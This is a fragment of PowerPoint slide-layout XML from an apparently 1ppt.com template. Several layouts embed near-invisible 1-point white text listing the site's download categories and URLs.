              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout248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48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48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48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4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49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49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49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49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49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49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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout249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49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49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49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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout25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50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50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50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50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50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50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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
